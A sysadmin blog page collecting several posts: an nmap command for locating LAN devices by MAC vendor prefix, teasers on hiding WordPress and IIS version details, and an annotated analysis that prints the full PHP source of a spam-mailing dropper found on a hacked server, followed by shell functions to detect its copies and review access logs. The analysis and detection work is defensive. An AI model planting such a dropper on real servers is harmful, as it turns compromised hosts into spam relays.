How to find a network device using its manufacturer name?

I’ve previously posted a note about finding a Raspberry Pi without knowing its IP address. Well, basically it’s the same here: you only need to change the MAC prefix (the OUI, the first three bytes of the MAC address, which identify the manufacturer) to find devices from another vendor. To wrap this up, this is a command to find a device by MAC prefix:

sudo nmap -sn 192.168.100.0/24 | awk '/^Nmap scan report/{ip=$NF; gsub(/[()]/,"",ip)} /^MAC Address: 00:D0:23/{print ip}'

(-sn is the current spelling of the old -sP host-discovery option; the gsub strips the parentheses nmap puts around the IP when the host has a reverse DNS name, e.g. "Nmap scan report for pi.lan (192.168.100.42)".)

And here you can find the current list of MAC prefix (OUI) assignments (use CTRL+F to search for the vendor).

Of course you need Nmap installed to do that! And sudo is necessary: the MAC addresses come from the ARP replies nmap sees when it scans its own subnet with raw-socket privileges. Run unprivileged, or against a subnet you are not directly attached to, nmap prints no "MAC Address:" lines at all and the awk filter matches nothing.

Beware that one manufacturer often owns many prefixes, so you may have to search for several of them. Also check the company name precisely: HP is listed as Hewlett Packard, but it can also appear as ProCurve Networking by HP.
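Since a vendor usually has several prefixes and nmap prints the IP in two different formats, here is a reusable version of the filter above as a shell function. This is an added example, not the command from the post: it reads the text output of nmap -sn on stdin, takes one or more OUI prefixes as arguments, and prints IP, MAC and the vendor string nmap reports. The OUI values, host names and addresses in the test data are constructed (B8:27:EB is a Raspberry Pi Foundation prefix; 00:D0:23 is the one used in the post).

```shell
# Added example, not the command from the post: a reusable version of the
# awk filter above. Reads the text output of "nmap -sn <subnet>" on stdin,
# takes one or more OUI prefixes as arguments (a vendor often has several)
# and prints "IP MAC VENDOR" for every host whose MAC starts with one of them.
# It copes with both report formats nmap prints:
#   "Nmap scan report for 192.168.100.5"
#   "Nmap scan report for pi.lan (192.168.100.5)"
# and matches the prefix case-insensitively (nmap prints upper-case hex).
# Hosts without a "MAC Address:" line (the scanner itself, or anything beyond
# the local segment) can never match, so scan the subnet you are attached to.
#
# Usage: sudo nmap -sn 192.168.100.0/24 | find_by_oui 00:D0:23 B8:27:EB
find_by_oui() {
    [ $# -gt 0 ] || { echo "usage: find_by_oui OUI [OUI...]" >&2; return 2; }
    # join the prefixes into an upper-case alternation: 00:D0:23|B8:27:EB
    prefixes=$(printf '%s\n' "$@" | tr 'a-f\n' 'A-F|' | sed 's/|$//')
    awk -v pat="^MAC ADDRESS: ($prefixes)" '
        /^Nmap scan report for/ {
            ip = $NF                      # last field is the IP ...
            gsub(/[()]/, "", ip)          # ... in parentheses when the host has a name
        }
        toupper($0) ~ pat {
            mac = $3
            vendor = $0
            sub(/^[^(]*\(/, "", vendor)   # keep only what is inside "( ... )"
            sub(/\)$/, "", vendor)
            print ip, mac, vendor
        }'
}
```

Pipe the live scan into it exactly as in the usage line; because the function only reads stdin, you can also run it over a saved nmap log (nmap -sn ... -oN scan.txt; find_by_oui 00:D0:23 < scan.txt) without rescanning the network.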

How to obscure your WordPress version and troll the attacker a little…

One of my company’s WordPress installations was hacked by Turkish hackers recently. After a quick investigation I found that the script version was a little bit old (not a very popular website, mea culpa, not updated very often). In case you didn’t know, WordPress is bundled with a readme file (readme.html in the site root) by default. I’ve found that malicious scripts or people use it to determine your version’s branch. So I decided to troll them a little bit… Continue reading How to obscure your WordPress version and troll the attacker a little…

How to remove unwanted HTTP Response Headers in IIS 7.5

Hiding the server software is one way to make your services harder to fingerprint; it does not replace patching, but it is cheap and takes a mass-scanning attacker’s easiest clue away. It’s quite easy to obscure the IIS identity. In a few steps I’ll show you how to accomplish this task on a WIMP stack (Windows, IIS, MySQL, PHP).

Continue reading How to remove unwanted HTTP Response Headers in IIS 7.5
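Whatever the steps are, you want a before/after check that the headers really went away. The following shell function is an added example and not part of the post: it reads raw response headers (what curl -sI prints) on stdin and echoes the ones that identify an IIS 7.5 stack: Server, X-Powered-By (set by ASP.NET and by PHP), X-AspNet-Version and X-AspNetMvc-Version. The header values in the test are constructed sample responses.

```shell
# Added example, not part of the post: a before/after check for the headers
# this post is about. Reads raw HTTP response headers (as printed by
# "curl -sI") on stdin and echoes the ones that identify the stack:
# Server, X-Powered-By, X-AspNet-Version and X-AspNetMvc-Version.
# Returns 1 when any of them is still present, 0 when the response is clean,
# so a deployment script can use it as a gate.
#
# Usage: curl -sI http://www.example.com/ | leaky_headers
leaky_headers() {
    # strip CRs from the CRLF line endings so the anchors match, then pick
    # the fingerprinting headers case-insensitively (header names are)
    leaks=$(tr -d '\r' \
        | grep -iE '^(Server|X-Powered-By|X-AspNet-Version|X-AspNetMvc-Version):' \
        || true)
    if [ -n "$leaks" ]; then
        printf '%s\n' "$leaks"
        return 1
    fi
    return 0
}
```

Run it against a static file, an .aspx page and a .php page separately: the ASP.NET headers only appear on managed requests, and X-Powered-By from PHP only on PHP requests, so a single URL can look clean while another still talks.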

PHP malicious code analysis no. 1

I found this piece of PHP malware on a compromised web server that I started to administer. Its name was a random character string, e.g. acbjxuu.php, and there were about 20 more scripts of this kind. It’s a rather simple script for spamming purposes. For your understanding I’ve written what it does in comments between the code lines.

<?php
// the dropper is driven entirely by POST: a plain GET renders an empty page,
// so opening the file in a browser shows nothing suspicious
if (isset($_POST['task']))
{
	// be sure to display all PHP errors (the operator wants to see failures)
	error_reporting(E_ALL);
	ini_set('display_errors', TRUE);
	// raise the PHP memory limit to handle large recipient lists
	ini_set('memory_limit', '512M');
	// disable the PHP execution time limit
	set_time_limit(0);
	ini_set('max_execution_time',0);
	ini_set('set_time_limit',0);   // not a real ini directive, a harmless no-op (sloppy malware author)
 
	// get the serialized array from the POST var named task; base64 hides it from naive log/WAF inspection
	// example array structure: array(array('to'=>'[email protected]', 'msg'=>'message content', 'subj'=>'Message subject ex. cheap cialis :)'));
	// note: unserialize() on attacker-controlled input is dangerous in itself, here it just carries the spam job
	$x = unserialize(base64_decode($_POST['task']));
 
	// if the task variable was wrongly serialized, just die silently... (loose == also drops an empty array)
	if ($x==false) {exit();}
 
	// URL of this very script, base64-encoded, so the spam template can
	// carry a reference to the compromised host that sent it
	$send_from = base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
 
	// now send half a million viagra & cialis related mails... 
	foreach ($x as $arr)
	{
		// echo every recipient: the HTTP response body is the operator's progress report
		echo $arr['to']."\r\n";
 
		$arr['msg'] = str_replace('[send_from_url]',$send_from,$arr['msg']);
 
		// HTML mail in windows-1251, a Cyrillic code page
		mail($arr['to'],$arr['subj'],$arr['msg'],"MIME-Version: 1.0\r\nContent-type: text/html; charset=windows-1251\r\n");
	}
	exit('SEND OK');
}
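When one copy of a dropper like this turns up, the useful next step is to sweep the whole web root for its siblings. The shell function below is an added example, not code from the post or from the server in question: it takes the two indicators visible in the script above (an attacker-supplied, base64-encoded serialized payload fed to unserialize(), and a call to mail()) and reports only the PHP files that contain both, which keeps ordinary code that merely uses one of them out of the list. The directory layout and file contents used in the test are constructed.

```shell
# Added example, not part of the post: hunt for further copies of the spam
# dropper in a web root. The two indicators come straight from the script
# above: a base64-encoded serialized payload taken from a request variable and
# passed to unserialize(), and a call to mail(). A file is reported only when
# it contains both, so a contact form (mail only) or a cache (unserialize only)
# does not show up. Extend the first pattern if you meet variants that wrap
# the payload differently (gzinflate(), str_rot13(), ...).
#
# Usage: scan_webroot /var/www/html
scan_webroot() {
    root=${1:?usage: scan_webroot DIR}
    find "$root" -type f -name '*.php' | while IFS= read -r f; do
        if grep -qE 'unserialize[[:space:]]*\([[:space:]]*base64_decode[[:space:]]*\([[:space:]]*\$_(POST|GET|REQUEST|COOKIE)\[' "$f" \
        && grep -qE '(^|[^A-Za-z0-9_])mail[[:space:]]*\(' "$f"; then
            printf '%s\n' "$f"
        fi
    done | LC_ALL=C sort
}
```

Compare the list against what the application should contain (a WordPress uploads directory, for instance, should hold no PHP at all), and hash the hits before removing them so you can match them against the other ~20 copies and against other servers.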

I’ll look in the logs for IP addresses that tried to reach these scripts. Maybe I’ll find something interesting. Wish me good luck and monitor your web server’s contents!
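The log review is the same exercise for both incidents on this page: the WordPress post above describes attackers fetching readme.html to learn the version branch, and the dropper just analysed only reacts to POST requests. The shell function below is an added example (not the post’s own code) that does that first pass over an Apache or nginx "combined" access log: it counts, per client, every request for readme.html and every POST to a PHP file, printing "IP METHOD path count". The log lines in the test are constructed, with addresses from the documentation ranges.

```shell
# Added example, not the post's own code: first pass over an Apache/nginx
# "combined" access log for the two things described on this page, clients
# that fetched readme.html (the WordPress version fingerprint) and clients
# that POSTed to a PHP file (the only way the spam script is driven).
# Output is "IP METHOD path count"; odd file names such as acbjxuu.php and
# the IPs hammering them stand out immediately.
#
# Usage: suspicious_clients /var/log/apache2/access.log
#    or: zcat access.log.*.gz | suspicious_clients
suspicious_clients() {
    awk '
    {
        ip = $1
        method = substr($6, 2)          # $6 is "\"GET" or "\"POST" in combined format
        path = $7
        sub(/\?.*/, "", path)           # drop the query string
        if (path ~ /(^|\/)readme\.html$/)
            hit[ip " " method " " path]++
        else if (method == "POST" && path ~ /\.php$/)
            hit[ip " " method " " path]++
    }
    END { for (k in hit) print k, hit[k] }
    ' "$@" | LC_ALL=C sort
}
```

Legitimate POST targets (wp-comments-post.php, wp-login.php, xmlrpc.php, admin-ajax.php) will appear too; what you are looking for are POSTs to names that have no business existing, coming from a small set of addresses, often with an empty referer and user agent like the spam-runner here.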